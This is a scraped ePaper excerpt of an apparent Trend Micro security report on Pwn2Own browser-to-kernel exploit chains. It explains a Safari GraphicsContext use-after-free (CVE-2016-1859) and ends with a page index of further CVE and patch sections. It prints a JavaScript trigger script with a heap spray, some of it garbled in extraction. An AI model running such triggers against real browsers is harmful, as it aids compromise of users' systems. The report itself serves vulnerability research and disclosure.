$hell on Earth

Recommendations

Info

Full Attack Chain Analysis The following sections describe the exploit chains in detail. Apple Safari Vulnerability to Kernel Execution by Tencent Security Team Shield Team Shield’s chain for Apple Safari was composed of a use-after-free vulnerability and a race condition vulnerability in the WindowServer process to escalate privileges. CVE-2016-1859 – Apple Safari GraphicsContext Use-After-Free Vulnerability A use-after-free vulnerability existed within the handling of GraphicsContext objects. The GraphicsContext object is originally created by WebCore::CanvasRenderingContext2D::drawTextInternal. It was possible for an attacker to free the GraphicsContext object when the canvas element sets its width attribute. The freed GraphicContext object would cause an access violation when it was reused in the setPlatformTextDrawingMode function. Here is the location within setPlatformTextDrawingMode where the access violation occurs: Figure 1: GraphicContext access violation 8 | <strong>$hell</strong> on Earth: From Browser to System Compromise
The vulnerability is triggered with the following script: var global_elementId = 0; var arr = new Array(); function trigger() { c3 = document.getElementById(“ca” + global_elementId.toString()); c3.width = 3333; var i = 0; document.write(“”); for (index = 0; index < 0x30; index++) { c3.width = 43; var buf = new ArrayBuffer(0x100); var int40Array = new Uint32Array(buf); for (i = 0; i < 0x100/4; i ++) { int40Array[i] = 0xc0c0c0c0; } arr[index] = int40Array; } } c2 = null; function exploit() { c1 = document.getElementById(“ca”+ global_elementId.toString()); c2 = c1.getContext(“2d”); c2.fillText(“clipPathUnits”, 100, 34); global_elementId += 1; } document.write(“ \n\n\n\n\ n\n\n ”); 9 | <strong>$hell</strong> on Earth: From Browser to System Compromise
Page 1 and 2: $hell on Earth: Fr
Page 3 and 4: The winning submissions to Pwn2Own
Page 5 and 6: Here are some of the welcome improv
Page 7: Pwn2Own 2015 Zeguang Zhao (Team509)
Page 11 and 12: Here is a snippet of the original c
Page 13 and 14: } if ( !(unsigned __int8)_mthid_isG
Page 15 and 16: Here is the location within JavaScr
Page 17 and 18: Exploitation of CVE-2016-1857 The e
Page 19 and 20: The following code triggers the vul
Page 21 and 22: CVE-2016-1796 - Apple OS X libATSSe
Page 23 and 24: Google Chrome Vulnerability to Kern
Page 25 and 26: ZDI-CAN-3612 Patch This is the root
Page 27 and 28: Here is a snippet of code showing t
Page 29 and 30: CVE-2016-1017 Patch To patch this v
Page 31 and 32: Adobe Flash Vulnerability to Kernel
Page 33 and 34: Finally, the pointer to the string
Page 35 and 36: This shows how PostIAMShellHookMess
Page 37 and 38: The patch itself looks straightforw
Page 39 and 40: As they do with all vulnerabilities
Page 41 and 42: Exploitation of CVE-2016-1018 Explo
Page 43 and 44: } } } a1[a3 + 345] = v6; a1[a3 + 34
Page 45 and 46: This is how GreGetUFI looked before
Page 47 and 48: Microsoft Edge Vulnerability to Ker
Page 49 and 50: The graph below represents the targ
Page 51 and 52: GetIntegerString returns the value
Page 53 and 54: Figure 6: AddAgent code diff Figure
Page 55 and 56: Consider the following JavaScript c
Page 57 and 58: The second heap spray was composed
Page 59 and 60:
D3DKMT_GDIMODEL_SYSMEM_PRESENTHISTO
Page 61 and 62:
Nevertheless, execution continues a
Page 63 and 64:
Conclusion Although all of the afor
Page 65:
TREND MICRO TM Trend Micro Incorpor
show all

$hell on Earth

Create successful ePaper yourself

Delete template?

Save as template?